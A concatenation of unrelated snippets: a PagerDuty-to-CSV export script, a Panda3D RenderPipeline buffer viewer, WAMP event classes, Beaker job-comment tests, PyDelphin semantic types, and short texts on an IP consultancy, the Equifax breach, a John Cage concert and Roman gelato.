            if method['type'] == 'push_notification_contact_method':
                entry['address'] = 'N/A'
            elif method['type'] == 'email_contact_method':
                entry['address'] = method['address']
            else:
                # Phone-style methods carry a separate country code.
                entry['address'] = '{country}+{address}'.format(
                    country=method['country_code'],
                    address=method['address']
                )
            methods.append(entry)
        if not methods:
            methods = [{
                'id': None,
                'type': None,
                'label': None,
                'address': None
            }]
        output.append({
            'name': user['name'],
            'id': user['id'],
            'email': user['email'],
            'role': user['role'],
            'contact_methods': methods
        })
    return output
def _encode_optional(value):
    """UTF-8 encode a text value for CSV output, passing None through.

    Placeholder contact-method rows (for users with no contact methods)
    carry None label/address values; calling .encode() on them raised
    AttributeError in the original implementation.
    """
    if value is None:
        return None
    return value.encode('utf-8')


def write_user_csv(user_data):
    """Create CSV from user data.

    Writes one row per (user, contact method) pair into a timestamped
    file in the working directory.
    :returns: the literal string "CSV created" on success.
    """
    filename = 'user_data_{timestamp}.csv'.format(
        timestamp=datetime.now().isoformat()
    )
    fieldnames = [
        'id',
        'name',
        'email',
        'role',
        'contact_method_id',
        'contact_method_type',
        'contact_method_label',
        'contact_method_address'
    ]
    with open(filename, 'w') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for user in user_data:
            for method in user['contact_methods']:
                writer.writerow({
                    'id': user['id'],
                    'name': user['name'].encode('utf-8'),
                    'email': user['email'].encode('utf-8'),
                    'role': user['role'],
                    'contact_method_id': method['id'],
                    'contact_method_type': method['type'],
                    'contact_method_label': _encode_optional(method['label']),
                    'contact_method_address': _encode_optional(method['address'])
                })
    return "CSV created"
def list_escalation_policies(team_id=None):
    """List all escalation policies in account, following pagination."""
    base_payload = {'limit': 100, 'team_ids[]': [team_id]}
    output = pd_get('/escalation_policies', base_payload)
    page = output
    offset = 0
    # Accumulate additional 100-policy pages while more are available.
    while page['more']:
        offset += 100
        page = pd_get('/escalation_policies', dict(base_payload, offset=offset))
        output['escalation_policies'] += page['escalation_policies']
    return output
def parse_ep_info(escalation_policies):
    """Parse relevant escalation policy info for reporting.

    Policies without rules get a single all-None placeholder rule so a
    CSV row is still produced for them.
    """
    output = []
    for ep in escalation_policies:
        rules = []
        for rule in ep['escalation_rules']:
            targets = []
            for target in rule['targets']:
                is_user = target['type'] in ('user', 'user_reference')
                targets.append({
                    'id': target['id'],
                    'type': 'user' if is_user else 'schedule',
                    'name': target['summary']
                })
            rules.append({
                'escalation_delay': rule['escalation_delay_in_minutes'],
                'id': rule['id'],
                'targets': targets
            })
        if not rules:
            rules = [{
                'id': None,
                'escalation_delay': None,
                'targets': [{
                    'id': None,
                    'type': None,
                    'name': None
                }]
            }]
        output.append({
            'name': ep['name'],
            'id': ep['id'],
            'rules': rules
        })
    return output
def write_escalation_policy_csv(ep_data):
    """Create CSV from escalation policy data.

    One row per (policy, rule, target) triple, written to a timestamped
    file in the working directory.
    """
    filename = 'escalation_policy_data_{timestamp}.csv'.format(
        timestamp=datetime.now().isoformat()
    )
    fieldnames = [
        'id',
        'name',
        'escalation_rule_id',
        'escalation_rule_delay',
        'escalation_rule_target_id',
        'escalation_rule_target_type',
        'escalation_rule_target_name'
    ]
    with open(filename, 'w') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for ep in ep_data:
            for rule in ep['rules']:
                for target in rule['targets']:
                    writer.writerow({
                        'id': ep['id'],
                        'name': ep['name'],
                        'escalation_rule_id': rule['id'],
                        'escalation_rule_delay': rule['escalation_delay'],
                        'escalation_rule_target_id': target['id'],
                        'escalation_rule_target_type': target['type'],
                        'escalation_rule_target_name': target['name']
                    })
    return "CSV created"
def list_schedules(team_id=None):
    """List all schedules in account, following API pagination."""
    base_payload = {'limit': 100, 'team_ids[]': [team_id]}
    output = pd_get('/schedules', base_payload)
    page = output
    offset = 0
    # Accumulate further 100-schedule pages while more are available.
    while page['more']:
        offset += 100
        page = pd_get('/schedules', dict(base_payload, offset=offset))
        output['schedules'] += page['schedules']
    return output
def list_schedule_oncalls(schedule_id):
    """List the current on-calls for a schedule, following pagination."""
    def fetch(offset=None):
        # Query a one-second window starting now, i.e. who is on call
        # at this very moment.
        payload = {
            'since': datetime.now().isoformat(),
            'until': (datetime.now() + timedelta(seconds=1)).isoformat(),
            'schedule_ids[]': [schedule_id],
            'limit': 100
        }
        if offset is not None:
            payload['offset'] = offset
        return pd_get('/oncalls', payload)

    output = fetch()
    page = output
    offset = 0
    while page['more']:
        offset += 100
        page = fetch(offset)
        output['oncalls'] += page['oncalls']
    return output
def parse_schedule_info(schedules):
    """Parse relevant schedule info for reporting.

    Each schedule is paired with its current on-calls, which requires
    one extra API round-trip per schedule.
    """
    return [{
        'name': schedule['name'],
        'id': schedule['id'],
        'description': schedule['description'],
        'time_zone': schedule['time_zone'],
        'oncalls': parse_oncall_info(
            list_schedule_oncalls(schedule['id'])['oncalls']
        )
    } for schedule in schedules]
def parse_oncall_info(oncalls):
    """Parse relevant on-call info for reporting.

    An empty input yields a single all-None placeholder entry so
    schedules with nobody on call still get a CSV row.
    """
    if not oncalls:
        return [{
            'user_name': None,
            'user_id': None,
            'escalation_level': None,
            'start': None,
            'end': None
        }]
    return [{
        'user_name': oncall['user']['summary'],
        'user_id': oncall['user']['id'],
        'escalation_level': oncall['escalation_level'],
        'start': oncall['start'],
        'end': oncall['end']
    } for oncall in oncalls]
def write_schedule_csv(schedule_data):
    """Create CSV from schedule data.

    One row per (schedule, on-call) pair, written to a timestamped file
    in the working directory.
    """
    filename = 'schedule_data_{timestamp}.csv'.format(
        timestamp=datetime.now().isoformat()
    )
    fieldnames = [
        'id',
        'name',
        'description',
        'time_zone',
        'oncall_id',
        'oncall_name',
        'oncall_escalation_level',
        'oncall_shift_start',
        'oncall_shift_end'
    ]
    with open(filename, 'w') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for schedule in schedule_data:
            for oncall in schedule['oncalls']:
                writer.writerow({
                    'id': schedule['id'],
                    'name': schedule['name'],
                    'description': schedule['description'],
                    'time_zone': schedule['time_zone'],
                    'oncall_id': oncall['user_id'],
                    'oncall_name': oncall['user_name'],
                    'oncall_escalation_level': oncall['escalation_level'],
                    'oncall_shift_start': oncall['start'],
                    'oncall_shift_end': oncall['end']
                })
    return "CSV created"
def list_teams():
    """List all teams in account, following API pagination."""
    output = pd_get('/teams', {'limit': 100})
    page = output
    offset = 0
    # Accumulate additional 100-team pages while more are available.
    while page['more']:
        offset += 100
        page = pd_get('/teams', {'limit': 100, 'offset': offset})
        output['teams'] += page['teams']
    return output
def parse_team_info(teams):
    """Parse relevant team info for reporting.

    For every team the associated users, schedules, escalation policies
    and services are fetched (one paginated API listing each) and
    reduced to (name, id) pairs.
    """
    output = []
    for team in teams:
        summary = {
            'name': team['name'],
            'id': team['id'],
            'users': [],
            'schedules': [],
            'escalation_policies': [],
            'services': []
        }
        for user in list_users(team['id'])['users']:
            summary['users'].append({
                'name': user['name'],
                'id': user['id']
            })
        for schedule in list_schedules(team['id'])['schedules']:
            summary['schedules'].append({
                'name': schedule['name'],
                'id': schedule['id']
            })
        for ep in list_escalation_policies(team['id'])['escalation_policies']:
            summary['escalation_policies'].append({
                'name': ep['name'],
                'id': ep['id']
            })
        for service in list_services(team['id'])['services']:
            summary['services'].append({
                'name': service['name'],
                'id': service['id']
            })
        output.append(summary)
    return output
def _team_base_row(team):
    """Return a CSV row dict for *team* with every entity column blanked.

    Extracted: the original repeated this ten-key dict literal four
    times (users / schedules / escalation policies / services).
    """
    return {
        'id': team['id'],
        'name': team['name'].encode('utf-8'),
        'user_id': None,
        'user_name': None,
        'schedule_id': None,
        'schedule_name': None,
        'escalation_policy_id': None,
        'escalation_policy_name': None,
        'service_id': None,
        'service_name': None
    }


def write_team_csv(team_data):
    """Create CSV from team data.

    Each user, schedule, escalation policy and service of a team becomes
    its own row; the columns of the other entity types stay empty.
    :returns: the literal string "CSV created" on success.
    """
    filename = 'team_data_{timestamp}.csv'.format(
        timestamp=datetime.now().isoformat()
    )
    fieldnames = [
        'id',
        'name',
        'user_id',
        'user_name',
        'schedule_id',
        'schedule_name',
        'escalation_policy_id',
        'escalation_policy_name',
        'service_id',
        'service_name'
    ]
    with open(filename, 'w') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for team in team_data:
            for user in team['users']:
                row = _team_base_row(team)
                row['user_id'] = user['id']
                row['user_name'] = user['name'].encode('utf-8')
                writer.writerow(row)
            for schedule in team['schedules']:
                row = _team_base_row(team)
                row['schedule_id'] = schedule['id']
                row['schedule_name'] = schedule['name'].encode('utf-8')
                writer.writerow(row)
            for ep in team['escalation_policies']:
                row = _team_base_row(team)
                row['escalation_policy_id'] = ep['id']
                row['escalation_policy_name'] = ep['name'].encode('utf-8')
                writer.writerow(row)
            for service in team['services']:
                row = _team_base_row(team)
                row['service_id'] = service['id']
                row['service_name'] = service['name'].encode('utf-8')
                writer.writerow(row)
    return "CSV created"
def list_services(team_id=None):
    """List all services, following API pagination."""
    base_payload = {'limit': 100, 'team_ids[]': [team_id]}
    output = pd_get('/services', base_payload)
    page = output
    offset = 0
    # Accumulate additional 100-service pages while more are available.
    while page['more']:
        offset += 100
        page = pd_get('/services', dict(base_payload, offset=offset))
        output['services'] += page['services']
    return output
def parse_service_info(services):
    """Parse relevant services info for reporting."""
    output = []
    for service in services:
        policy = service['escalation_policy']
        output.append({
            'id': service['id'],
            # Name is pre-encoded here; write_service_csv writes it as-is.
            'name': service['name'].encode('utf-8'),
            'escalation_policy_id': policy['id'],
            'escalation_policy_name': policy['summary'],
            'alert_creation': service['alert_creation']
        })
    return output
def write_service_csv(service_data):
    """Create CSV from service data.

    One row per service, written to a timestamped file in the working
    directory.
    """
    filename = 'service_data_{timestamp}.csv'.format(
        timestamp=datetime.now().isoformat()
    )
    fieldnames = [
        'id',
        'name',
        'escalation_policy_id',
        'escalation_policy_name',
        'alert_creation'
    ]
    with open(filename, 'w') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writeheader()
        for service in service_data:
            writer.writerow({
                'id': service['id'],
                'name': service['name'],
                'escalation_policy_id': service['escalation_policy_id'],
                'escalation_policy_name': (
                    service['escalation_policy_name'].encode('utf-8')
                ),
                'alert_creation': service['alert_creation']
            })
    return "CSV created"
if __name__ == '__main__':
    # Export every report type; each helper paginates through the API
    # and writes a timestamped CSV into the working directory.
    write_user_csv(parse_user_info(list_users()['users']))
    write_escalation_policy_csv(parse_ep_info(
        list_escalation_policies()['escalation_policies']
    ))
    write_schedule_csv(parse_schedule_info(list_schedules()['schedules']))
    write_team_csv(parse_team_info(list_teams()['teams']))
    write_service_csv(parse_service_info(list_services()['services']))
    # print() works under both Python 2 and 3; the original used the
    # Python-2-only print statement, a SyntaxError on Python 3.
    print("Data has finished exporting")
|
Vision Assets is a multi-disciplinary consultancy specialising in Intellectual Property, Licensing, Product Development and Growth Funding.
Intellectual Property assets are the life-blood of an innovative business and accrue value as it grows. We work with you to protect your assets from infringement and to maximise commercial potential.
We offer a comprehensive review of your business assets to identify the most powerful protections available to them, from Registered Trade Marks and Registered Designs to Copyright, Design Right and Patents. We are well versed in advising businesses through complex applications involving multiple levels of Intellectual Property protection. Drawing upon many years of commercial experience, we are able to guide you through the process of applying for registrations in the UK, Europe and internationally.
For fast growing businesses that may be diversifying, seeking investment or looking to sell, we offer a specialist IP Strategy encompassing key areas, including: Acquisition, Transfer, Merger, Co-existence, Leveraging, Valuation and Sale of assets.
Licensing deals and collaborations can be lucrative and facilitate cost-efficient entry into new markets. Assert your Intellectual Property rights from day one.
We have many years of commercial experience in structuring international Licensing Deals, Brand Collaborations and Third Party agreements. We offer a comprehensive consultancy service that equips you with the knowledge and tools to assert your business’ Intellectual Property rights with clarity and to engage in negotiations with confidence.
For companies seeking to establish an international Licensing business from scratch, we offer a turn-key Licensing Strategy service that navigates the entire process from choosing the right commercial licensee in each new product sector, to securing the maximum protection for and returns from assets.
Commercialising your Intellectual Property can be exhilarating and daunting in equal measure. Let us guide you through the development process from first prototype to retail-ready product.
We offer a comprehensive consultancy that guides you through the Product Development and Manufacturing process from Prototyping and Sampling, to Testing and Consumer Feedback, all the way to Mass Manufacture. Our considerable commercial experience across multiple sectors and international markets can facilitate Strategic Partnerships with leading manufacturers and industry experts, which stand to give your business and its products significant competitive edge.
For businesses seeking to break into new markets and engage in import and export, we offer a specialist International Trade consultancy.
Intellectual Property requires funds to grow and we know that innovation flourishes when the world is in a state of flux. Let us help you to navigate the funding marketplace and accelerate your business.
We offer a comprehensive review of your business and its long term growth objectives to identify a broad set of commercial funding options including Grant Funding, Loans, Equity Finance and Export Finance, which may be available through both publicly and privately backed programmes in the UK, Europe and internationally.
For businesses engaged in innovative Research and Development, we are able to offer a specialist consultancy with links to leading organisations operating in diverse sectors.
|
"""
RenderPipeline
Copyright (c) 2014-2016 tobspr <tobias.springer1@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import division
from functools import partial
from panda3d.core import Texture, Vec3
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectScrolledFrame import DirectScrolledFrame
from direct.gui.DirectGui import DGG
from rplibs.six import itervalues
from rpcore.image import Image
from rpcore.util.display_shader_builder import DisplayShaderBuilder
from rpcore.globals import Globals
from rpcore.render_target import RenderTarget
from rpcore.gui.texture_preview import TexturePreview
from rpcore.gui.sprite import Sprite
from rpcore.gui.labeled_checkbox import LabeledCheckbox
from rpcore.gui.text import Text
from rpcore.gui.draggable_window import DraggableWindow
class BufferViewer(DraggableWindow):
    """ This class provides a view into the buffers to inspect them """

    def __init__(self, pipeline, parent):
        """ Constructs the buffer viewer """
        DraggableWindow.__init__(self, width=1400, height=800, parent=parent,
                                 title="Buffer- and Image-Browser")
        self._pipeline = pipeline
        # Height of the scrollable canvas; recomputed in _set_scroll_height.
        self._scroll_height = 3000
        # Whether plain image resources are listed next to render targets.
        self._display_images = False
        # Textures currently rendered in the window (filled by _perform_update).
        self._stages = []
        self._create_components()
        self._tex_preview = TexturePreview(self._pipeline, parent)
        self._tex_preview.hide()
        self.hide()

    def toggle(self):
        """ Updates all the buffers and then toggles the buffer viewer """
        if self._visible:
            self._remove_components()
            self.hide()
        else:
            self._perform_update()
            self.show()

    @property
    def entries(self):
        """ Returns a list of all registered entries """
        return RenderTarget.REGISTERED_TARGETS + Image.REGISTERED_IMAGES

    @property
    def stage_information(self):
        """ Returns a (memory, count) tuple: the estimated texture memory
        of all attached stages (as reported by estimate_texture_memory)
        and the number of textures counted. """
        count, memory = 0, 0
        for entry in self.entries:
            if isinstance(entry, Texture):
                memory += entry.estimate_texture_memory()
                count += 1
            # Compared by class name to avoid circular imports of RenderTarget.
            elif entry.__class__.__name__ == "RenderTarget":
                for target in itervalues(entry.targets):
                    memory += target.estimate_texture_memory()
                    count += 1
            else:
                self.warn("Unkown type:", entry.__class__.__name__)
        return memory, count

    def _create_components(self):
        """ Creates the window components """
        DraggableWindow._create_components(self)
        self._content_frame = DirectScrolledFrame(
            frameSize=(0, self._width - 15, 0, self._height - 70),
            canvasSize=(0, self._width - 80, 0, self._scroll_height),
            autoHideScrollBars=False,
            scrollBarWidth=12.0,
            frameColor=(0, 0, 0, 0),
            verticalScroll_relief=DGG.FLAT,
            verticalScroll_incButton_relief=DGG.FLAT,
            verticalScroll_decButton_relief=DGG.FLAT,
            verticalScroll_thumb_relief=DGG.FLAT,
            verticalScroll_frameColor=(0.05, 0.05, 0.05, 1),
            verticalScroll_thumb_frameColor=(0.8, 0.8, 0.8, 1),
            verticalScroll_incButton_frameColor=(0.6, 0.6, 0.6, 1),
            verticalScroll_decButton_frameColor=(0.6, 0.6, 0.6, 1),
            horizontalScroll_frameColor=(0, 0, 0, 0),
            horizontalScroll_relief=False,
            horizontalScroll_thumb_relief=False,
            horizontalScroll_incButton_relief=False,
            horizontalScroll_decButton_relief=False,
            parent=self._node,
            pos=(0, 1, -self._height))
        self._content_node = self._content_frame.getCanvas().attach_new_node(
            "BufferComponents")
        # Flip the canvas vertically so entry rows lay out top-down.
        self._content_node.set_scale(1, 1, -1)
        self._content_node.set_z(self._scroll_height)
        self._chb_show_images = LabeledCheckbox(
            parent=self._node, x=10, y=43, chb_callback=self._set_show_images,
            chb_checked=False, text="Display image resources",
            text_color=Vec3(0.4), expand_width=330)

    def _set_show_images(self, arg):
        """ Sets whether images and textures will be shown """
        self._display_images = arg
        self._perform_update()

    def _set_scroll_height(self, height):
        """ Sets the maximum scroll height in the content frame """
        self._scroll_height = height
        self._content_frame["canvasSize"] = (0, self._width - 80, 0, self._scroll_height)
        self._content_node.set_z(self._scroll_height)

    def _remove_components(self):
        """ Removes all components of the buffer viewer """
        self._content_node.node().remove_all_children()
        self._tex_preview.hide()

    def _perform_update(self):
        """ Collects all entries, extracts their images and re-renders the
        window """
        # Collect texture stages
        self._stages = []
        for entry in self.entries:
            if isinstance(entry, Texture):
                # Plain textures are listed only when the checkbox is active.
                if self._display_images:
                    self._stages.append(entry)
            # Can not use isinstance or we get circular import references
            elif entry.__class__.__name__ == "RenderTarget":
                for target in itervalues(entry.targets):
                    self._stages.append(target)
            else:
                self.warn("Unrecognized instance!", entry.__class__)
        self._render_stages()

    def _on_texture_hovered(self, hover_frame, evt=None):  # pylint: disable=W0613
        """ Internal method when a texture is hovered """
        hover_frame["frameColor"] = (0, 0, 0, 0.1)

    def _on_texture_blurred(self, hover_frame, evt=None):  # pylint: disable=W0613
        """ Internal method when a texture is blurred """
        hover_frame["frameColor"] = (0, 0, 0, 0)

    def _on_texture_clicked(self, tex_handle, evt=None):  # pylint: disable=W0613
        """ Internal method when a texture is clicked: opens the preview """
        self._tex_preview.present(tex_handle)

    def _render_stages(self):
        """ Renders the stages to the window """
        self._remove_components()
        entries_per_row = 6
        # True division (see the __future__ import at the top of the file).
        aspect = Globals.base.win.get_y_size() / Globals.base.win.get_x_size()
        entry_width = 235
        entry_height = (entry_width - 20) * aspect + 55
        # Store already processed images
        processed = set()
        index = -1
        # Iterate over all stages
        for stage_tex in self._stages:
            # Skip duplicates (the same texture may back several entries).
            if stage_tex in processed:
                continue
            processed.add(stage_tex)
            index += 1
            stage_name = stage_tex.get_name()
            # Grid position of this entry's card.
            xoffs = index % entries_per_row
            yoffs = index // entries_per_row
            node = self._content_node.attach_new_node("Preview")
            node.set_sz(-1)
            node.set_pos(10 + xoffs * (entry_width - 14), 1, yoffs * (entry_height - 14 + 10))
            r, g, b = 0.2, 0.2, 0.2
            # Strip internal prefixes so only the short stage name is shown.
            stage_name = stage_name.replace("render_pipeline_internal:", "")
            parts = stage_name.split(":")
            stage_name = parts[-1]
            DirectFrame(
                parent=node, frameSize=(7, entry_width - 17, -7, -entry_height + 17),
                frameColor=(r, g, b, 1.0), pos=(0, 0, 0))
            # Invisible overlay frame used for hover/click handling.
            frame_hover = DirectFrame(
                parent=node, frameSize=(0, entry_width - 10, 0, -entry_height + 10),
                frameColor=(0, 0, 0, 0), pos=(0, 0, 0), state=DGG.NORMAL)
            frame_hover.bind(
                DGG.ENTER, partial(self._on_texture_hovered, frame_hover))
            frame_hover.bind(
                DGG.EXIT, partial(self._on_texture_blurred, frame_hover))
            frame_hover.bind(
                DGG.B1PRESS, partial(self._on_texture_clicked, stage_tex))
            Text(text=stage_name, x=15, y=29, parent=node, size=12, color=Vec3(0.8))
            # Scale image so it always fits
            w, h = stage_tex.get_x_size(), stage_tex.get_y_size()
            padd_x, padd_y = 24, 57
            scale_x = (entry_width - padd_x) / max(1, w)
            scale_y = (entry_height - padd_y) / max(1, h)
            scale_factor = min(scale_x, scale_y)
            if stage_tex.get_texture_type() == Image.TT_buffer_texture:
                # Buffer textures are drawn at the full card size instead
                # of being scaled by their pixel dimensions.
                scale_factor = 1
                w = entry_width - padd_x
                h = entry_height - padd_y
            preview = Sprite(
                image=stage_tex, w=scale_factor * w, h=scale_factor * h,
                any_filter=False, parent=node, x=7, y=40, transparent=False)
            preview.set_shader_input("mipmap", 0)
            preview.set_shader_input("slice", 0)
            preview.set_shader_input("brightness", 1)
            preview.set_shader_input("tonemap", False)
            preview_shader = DisplayShaderBuilder.build(stage_tex, scale_factor*w, scale_factor*h)
            preview.set_shader(preview_shader)
        num_rows = (index + entries_per_row) // entries_per_row
        self._set_scroll_height(50 + (entry_height - 14 + 10) * num_rows)
|
Cybersecurity expert Morgan Wright discusses why the Equifax data breach probably affects more than 143 million people, and what the penalty should be for the company’s CEO, Richard Smith.
The blows keep coming for Equifax (NYSE:EFX) as shares continue to tumble and the Federal Trade Commission announced plans to open an investigation into the credit reporting company Thursday after the company went public with its massive security breach last week, putting 143 million Americans’ personal data at risk.
In case you missed all the drama, here’s a timeline of events involving one of the biggest security breaches of all time.
Monday, September 11 - Two key US senators ask Equifax Inc. to answer detailed questions about a breach of information affecting up to 143 million Americans, including whether U.S. government agency records were compromised in the hack.
Tuesday, September 12 - Equifax CEO Richard Smith writes an op-ed for USA Today apologizing for the intrusion and vows to make changes to protect against cyber crimes in the future.
|
from autobahn.wamp.types import SessionDetails, CloseDetails
from asphalt.core import Event
__all__ = ('SessionJoinEvent', 'SessionLeaveEvent')
class SessionJoinEvent(Event):
    """
    Dispatched when the client has successfully joined the WAMP realm on
    the router.

    :ivar details: the autobahn-provided session details
    :vartype details: ~autobahn.wamp.types.SessionDetails
    """

    __slots__ = ('details',)

    def __init__(self, source, topic: str, session_details: SessionDetails) -> None:
        super().__init__(source, topic)
        # Keep the full autobahn details object available to subscribers.
        self.details = session_details
class SessionLeaveEvent(Event):
    """
    Dispatched when the client has left the WAMP realm on the router.

    :ivar str reason: the reason why the client left the realm
    :ivar str message: the closing message
    """

    __slots__ = ('reason', 'message')

    def __init__(self, source, topic: str, close_details: CloseDetails) -> None:
        super().__init__(source, topic)
        # Unpack only the two fields subscribers care about from the
        # autobahn CloseDetails object.
        self.reason = close_details.reason
        self.message = close_details.message
|
Saturday’s Cage/Gould concert at RPI’s EMPAC in Troy NY is the next in a long line of John Cage centenary tributes happening this year. Featuring the Rensselaer Contemporary Music Ensemble directed by Michael Century, the program includes works by John Cage juxtaposed with a recreation of part of Glenn Gould’s final piano concert.
The French philosopher Elie During knits it all together in a pre-performance lecture (5pm) with the help of a vacuum cleaner (no kidding!) or at least the metaphor of a vacuum cleaner or the memory of the sound of a vacuum cleaner or the memory of the experience of the obliteration of all other sounds thanks to a vacuum cleaner… I guess we’ll have to go to the lecture to find out for sure.
|
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
from turbogears.database import session
from bkr.inttest import data_setup, with_transaction
from bkr.inttest.client import run_client, create_client_config, \
ClientError, ClientTestCase
class JobCommentTest(ClientTestCase):
    """Tests for the ``bkr job-comment`` client command."""

    @with_transaction
    def setUp(self):
        # A completed job provides recipe sets, tasks, and task results
        # that comments can be attached to.
        self.job = data_setup.create_completed_job()

    def test_invalid_taskpec(self):
        # A bare numeric id without a type prefix (J:, RS:, T:, TR:)
        # is not a valid taskspec.
        try:
            run_client(['bkr', 'job-comment', '12345'])
            self.fail('should raise')
        except ClientError as e:
            self.assertIn('Invalid taskspec', e.stderr_output)

    def test_post_comment_to_recipeset(self):
        with session.begin():
            recipe_set = self.job.recipesets[0]
        comment_text = u'Never gonna give you up'
        run_client(['bkr', 'job-comment', recipe_set.t_id,
                    '--message', comment_text])
        with session.begin():
            session.expire_all()
            self.assertEqual(recipe_set.comments[0].comment, comment_text)

    def test_post_comment_to_recipetask(self):
        with session.begin():
            task = self.job.recipesets[0].recipes[0].tasks[0]
        comment_text = u'Never gonna let you down'
        run_client(['bkr', 'job-comment', task.t_id,
                    '--message', comment_text])
        with session.begin():
            session.expire_all()
            self.assertEqual(task.comments[0].comment, comment_text)

    def test_post_comment_to_task_result(self):
        with session.begin():
            recipe = data_setup.create_recipe()
            job = data_setup.create_job_for_recipes([recipe])
            data_setup.mark_job_complete(job)
            result = recipe.tasks[0].results[0]
        comment_text = u'Never gonna run around and desert you'
        run_client(['bkr', 'job-comment', result.t_id,
                    '--message', comment_text])
        with session.begin():
            session.expire_all()
            self.assertEqual(result.comments[0].comment, comment_text)

    def test_anonymous_user_cannot_comment(self):
        with session.begin():
            client_config = create_client_config(username=None, password=None)
        comment_text = u'Never gonna make you cry'
        try:
            run_client(['bkr', 'job-comment', self.job.recipesets[0].t_id,
                        '--message', comment_text], config=client_config)
            self.fail('should raise')
        except ClientError as e:
            # assertEqual, not the deprecated assertEquals alias, for
            # consistency with the rest of this class.
            self.assertEqual(e.status, 1)
            self.assertIn('Invalid username or password', e.stderr_output)

    def test_empty_comment_is_rejected(self):
        try:
            run_client(['bkr', 'job-comment', self.job.recipesets[0].t_id,
                        '--message', ''])
            self.fail('should raise')
        except ClientError as e:
            self.assertIn('Comment text cannot be empty', e.stderr_output)

    def test_post_comment_on_multiple_taskspec(self):
        # One invocation may comment on recipe sets from different jobs.
        with session.begin():
            other_job = data_setup.create_completed_job()
            recipe_set1 = self.job.recipesets[0]
            recipe_set2 = other_job.recipesets[0]
        comment_text = u'Never gonna say goodbye'
        run_client(['bkr', 'job-comment', recipe_set1.t_id, recipe_set2.t_id,
                    '--message', comment_text])
        with session.begin():
            session.expire_all()
            self.assertEqual(recipe_set1.comments[0].comment, comment_text)
            self.assertEqual(recipe_set2.comments[0].comment, comment_text)

    def test_post_comment_to_tr_taskspec_string_fails(self):
        # TR: taskspecs require an integer task-result id.
        comment_text = u'Never gonna tell a lie...'
        try:
            run_client(['bkr', 'job-comment', 'TR:thisisnotanint', '--message',
                        comment_text])
            self.fail('should raise')
        except ClientError as e:
            self.assertIn('Recipe task result not found', e.stderr_output)
|
On a Mission to Find the Best Gelato in Rome. Since moving to Rome in 2001, I have made it my mission to seek out the best gelato in Rome . . .I am still on that mission.
Rome is truly an astonishing city, a cross between the high rises of a modern society and the scatter of ruins from a historic era. This city is claimed to be one of the oldest named cities in the world! A city so old that it has been called ‘The Eternal City’.
|
"""
Basic classes and functions for semantic representations.
"""
from typing import (Optional, Mapping, Tuple, List, Union, Sequence)
from delphin.lnk import Lnk, LnkMixin
# Default modules need to import the PyDelphin version
from delphin.__about__ import __version__ # noqa: F401
# Basic Types

# Identifiers are node ids in DMRS and EDS, or variables in MRS
# including handles and underspecified variables
Identifier = Union[str, int]
# A semantic role label (e.g., 'ARG0', 'RSTR')
Role = str
# A single (role, target-identifier) pair
RoleArgument = Tuple[Role, Identifier]
# Maps a predication id to its outgoing (role, target) argument pairs
ArgumentStructure = Mapping[Identifier, List[RoleArgument]]
# Maps morphosemantic property names to their values
PropertyMap = Mapping[str, str]
# Functions for the default ordering of feature lists
def role_priority(role: str) -> Tuple[bool, bool, str]:
    """Return a sort key that orders roles canonically.

    The canonical order is: LBL ARG* RSTR BODY *-INDEX *-HNDL CARG ...
    """
    normalized = role.upper()
    is_not_label = normalized != 'LBL'
    sorts_last = normalized in ('BODY', 'CARG')
    return (is_not_label, sorts_last, normalized)
_COMMON_PROPERTIES = (
'PERS', # [x] person (ERG, Jacy)
'NUM', # [x] number (ERG, Jacy)
'GEND', # [x] gender (ERG, Jacy)
'IND', # [x] individuated (ERG)
'PT', # [x] pronoun-type (ERG)
'PRONTYPE', # [x] pronoun-type (Jacy)
'SF', # [e] sentential-force (ERG)
'TENSE', # [e] tense (ERG, Jacy)
'MOOD', # [e] mood (ERG, Jacy)
'PROG', # [e] progressive (ERG, Jacy)
'PERF', # [e] perfective (ERG, Jacy)
'ASPECT', # [e] other aspect (Jacy)
'PASS', # [e] passive (Jacy)
)
_COMMON_PROPERTY_INDEX = dict((p, i) for i, p in enumerate(_COMMON_PROPERTIES))
def property_priority(prop: str) -> Tuple[int, str]:
    """
    Return a sort key giving the display priority of property *prop*.

    Note:
        The ordering provided by this function was modeled on the ERG
        and Jacy grammars and may be inaccurate for others. Properties
        not known to this function will be sorted alphabetically.
    """
    rank = _COMMON_PROPERTY_INDEX.get(prop.upper())
    if rank is None:
        # Unknown properties sort after all known ones, alphabetically.
        rank = len(_COMMON_PROPERTIES)
    return (rank, prop)
# Classes for Semantic Structures
class Predication(LnkMixin):
    """
    An instance of a predicate in a semantic structure.

    While a predicate (see :mod:`delphin.predicate`) describes a
    possible semantic entity, a predication is one concrete
    instantiation of a predicate within a structure. Predications
    sharing the same predicate form are therefore distinct objects,
    each with its own identifier and, if specified, its own surface
    alignment.
    """

    __slots__ = ('id', 'predicate', 'type', 'base')

    def __init__(self,
                 id: Identifier,
                 predicate: str,
                 type: Union[str, None],
                 lnk: Optional[Lnk],
                 surface,
                 base):
        super().__init__(lnk, surface)
        self.id = id
        self.predicate = predicate
        self.type = type
        self.base = base

